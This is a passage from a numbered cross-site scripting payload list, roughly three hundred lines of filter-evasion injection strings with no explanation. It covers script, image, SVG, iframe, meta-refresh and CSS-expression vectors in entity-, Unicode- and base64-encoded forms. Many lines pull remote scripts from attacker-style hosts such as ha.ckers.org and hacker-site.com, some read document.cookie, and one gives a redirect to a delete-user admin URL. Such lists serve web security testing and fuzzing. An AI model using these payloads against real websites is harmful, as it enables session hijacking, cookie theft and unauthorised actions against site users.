  753. <XSS STYLE="xss:expression(alert('XSS'))">
  754. <XSS STYLE="behavior: url(xss.htc);">
  755. ¼script¾alert(¢XSS¢)¼/script¾
  756. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  757. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  758. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  759. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  760. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  761. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  762. <TABLE BACKGROUND="javascript:alert('XSS')">
  763. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  764. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  765. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  766. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  767. <DIV STYLE="width: expression(alert('XSS'));">
  768. <BASE HREF="javascript:alert('XSS');//">
  769. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  770. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  771. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  772. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  773. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  774. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  775. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  776. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  777. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  778. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  779. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  780. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  781. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  782. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  783. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  784. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  785. <A HREF="http://66.102.7.147/">XSS</A>
  786. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  787. <A HREF="http://1113982867/">XSS</A>
  788. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  789. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  790. <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
  791. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  792. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  793. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  794. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  795. <img/src=`` onerror=this.onerror=confirm(1)
  796. <form><isindex formaction="javascript&colon;confirm(1)"
  797. <img src=``&NewLine; onerror=alert(1)&NewLine;
  798. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  799. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  800. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  801. <script /**/>/**/alert(1)/**/</script /**/
  802. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
  803. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  804. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  805. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
  806. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  807. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  808. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  809. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  810. </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
  811. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  812. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  813. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  814. http://www.google<script .com>alert(document.location)</script
  815. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  816. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  817. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  818. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  819. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  820. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  821. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  822. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  823. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  824. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  825. <script ~~~>alert(0%0)</script ~~~>
  826. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  827. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  828. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  829. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  830. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  831. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  832. <div/style="width:expression(confirm(1))">X</div> {IE7}
  833. <iframe// src=javaSCRIPT&colon;alert(1)
  834. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  835. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  836. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  837. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  838. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  839. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  840. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  841. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  842. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  843. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  844. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  845. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  846. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  847. <var onmouseover="prompt(1)">On Mouse Over</var>
  848. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  849. <img src="/" =_=" title="onerror='prompt(1)'">
  850. <%<!--'%><script>alert(1);</script -->
  851. <script src="data:text/javascript,alert(1)"></script>
  852. <iframe/src \/\/onload = prompt(1)
  853. <iframe/onreadystatechange=alert(1)
  854. <svg/onload=alert(1)
  855. <input value=<><iframe/src=javascript:confirm(1)
  856. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  857. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  858. <img src=`xx:xx`onerror=alert(1)>
  859. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  860. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  861. <math><a xlink:href="//jsfiddle.net/t846h/">click
  862. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  863. <svg contentScriptType=text/vbs><script>MsgBox+1
  864. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  865. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  866. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  867. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  868. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  869. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  870. <script>+-+-1-+-+alert(1)</script>
  871. <body/onload=&lt;!--&gt;&#10alert(1)>
  872. <script itworksinallbrowsers>/*<script* */alert(1)</script
  873. <img src ?itworksonchrome?\/onerror = alert(1)
  874. <svg><script>//&NewLine;confirm(1);</script </svg>
  875. <svg><script onlypossibleinopera:-)> alert(1)
  876. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  877. <script x> alert(1) </script 1=2
  878. <div/onmouseover='alert(1)'> style="x:">
  879. <--`<img/src=` onerror=alert(1)> --!>
  880. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  881. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  882. "><img src=x onerror=window.open('https://www.google.com/');>
  883. <form><button formaction=javascript&colon;alert(1)>CLICKME
  884. <math><a xlink:href="//jsfiddle.net/t846h/">click
  885. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  886. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  887. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  888. '';!--"<XSS>=&{()}
  889. '>//\\,<'>">">"*"
  890. '); alert('XSS
  891. <script>alert(1);</script>
  892. <script>alert('XSS');</script>
  893. <IMG SRC="javascript:alert('XSS');">
  894. <IMG SRC=javascript:alert('XSS')>
  895. <IMG SRC=javascript:alert('XSS')>
  896. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  897. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  898. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  899. <script>alert(String.fromCharCode(88,83,83))</script>
  900. <img src=foo.png onerror=alert(/xssed/) />
  901. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  902. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  903. <marquee><script>alert('XSS')</script></marquee>
  904. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  905. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  906. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  907. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  908. "><script>alert(0)</script>
  909. <script src=http://yoursite.com/your_files.js></script>
  910. </title><script>alert(/xss/)</script>
  911. </textarea><script>alert(/xss/)</script>
  912. <IMG LOWSRC=\"javascript:alert('XSS')\">
  913. <IMG DYNSRC=\"javascript:alert('XSS')\">
  914. <font style='color:expression(alert(document.cookie))'>
  915. <img src="javascript:alert('XSS')">
  916. <script language="JavaScript">alert('XSS')</script>
  917. <body onunload="javascript:alert('XSS');">
  918. <body onLoad="alert('XSS');"
  919. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  920. "/></a></><img src=1.gif onerror=alert(1)>
  921. window.alert("Bonjour !");
  922. <div style="x:expression((window.r==1)?'':eval('r=1;
  923. alert(String.fromCharCode(88,83,83));'))">
  924. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  925. "><script alert(String.fromCharCode(88,83,83))</script>
  926. '>><marquee><h1>XSS</h1></marquee>
  927. '">><script>alert('XSS')</script>
  928. '">><marquee><h1>XSS</h1></marquee>
  929. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  930. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  931. <script>var var = 1; alert(var)</script>
  932. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  933. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  934. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  935. " onfocus=alert(document.domain) "> <"
  936. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  937. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  938. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  939. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  940. <br size=\"&{alert('XSS')}\">
  941. <scrscriptipt>alert(1)</scrscriptipt>
  942. </br style=a:expression(alert())>
  943. </script><script>alert(1)</script>
  944. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  945. [color=red width=expression(alert(123))][color]
  946. <BASE HREF="javascript:alert('XSS');//">
  947. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  948. "></iframe><script>alert(123)</script>
  949. <body onLoad="while(true) alert('XSS');">
  950. '"></title><script>alert(1111)</script>
  951. </textarea>'"><script>alert(document.cookie)</script>
  952. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  953. </script></script><<<<script><>>>><<<script>alert(123)</script>
  954. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  955. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  956. '></select><script>alert(123)</script>
  957. '>"><script src = 'http://www.site.com/XSS.js'></script>
  958. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  959. <SCRIPT>document.write("XSS");</SCRIPT>
  960. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  961. ='><script>alert("xss")</script>
  962. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  963. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  964. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  965. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  966. src="http://www.site.com/XSS.js"></script>
  967. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  968. !--" /><script>alert('xss');</script>
  969. <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  970. "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  971. ">></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  972. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  973. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  974. "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
  975. '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  976. <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  977. '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
  978. "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
  979. \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
  980. '); alert('xss'); var x='
  981. \\'); alert(\'xss\');var x=\'
  982. //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
  983. >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
  984. <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
  985. <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
  986. <SCRIPT> alert(“XSS”); </SCRIPT>
  987. <BODY ONLOAD=alert("XSS")>
  988. <BODY BACKGROUND="javascript:alert('XSS')">
  989. <IMG SRC="javascript:alert('XSS');">
  990. <IMG DYNSRC="javascript:alert('XSS')">
  991. <IMG LOWSRC="javascript:alert('XSS')">
  992. <IFRAME SRC=”http://hacker-site.com/xss.html”>
  993. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  994. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  995. <TABLE BACKGROUND="javascript:alert('XSS')">
  996. <TD BACKGROUND="javascript:alert('XSS')">
  997. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  998. <DIV STYLE="width: expression(alert('XSS'));">
  999. <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
  1000. <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
  1001. &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  1002. &apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
  1003. &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
  1004. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
  1005. &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  1006. &lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
  1007. &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1008. &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1009. &lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
  1010. &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
  1011. &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
  1012. &lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
  1013. &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
  1014. &lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
  1015. &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1016. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1017. &lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
  1018. &lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1019. &lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1020. &lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
  1021. exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
  1022. &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  1023. &lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
  1024. &lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
  1025. &lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
  1026. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1027. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1028. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
  1029. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1030. &lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
  1031. &lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
  1032. &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
  1033. &lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
  1034. &a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
  1035. lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
  1036. &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
  1037. &lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
  1038. &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  1039. &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
  1040. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1041. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
  1042. &lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
  1043. &lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
  1044. &lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
  1045. &lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
  1046. &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  1047. &lt;HTML xmlns:xss&gt;
  1048. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
  1049. &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  1050. &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
  1051. &lt;HTML&gt;&lt;BODY&gt;
  1052. &lt;!--[if gte IE 4]&gt;
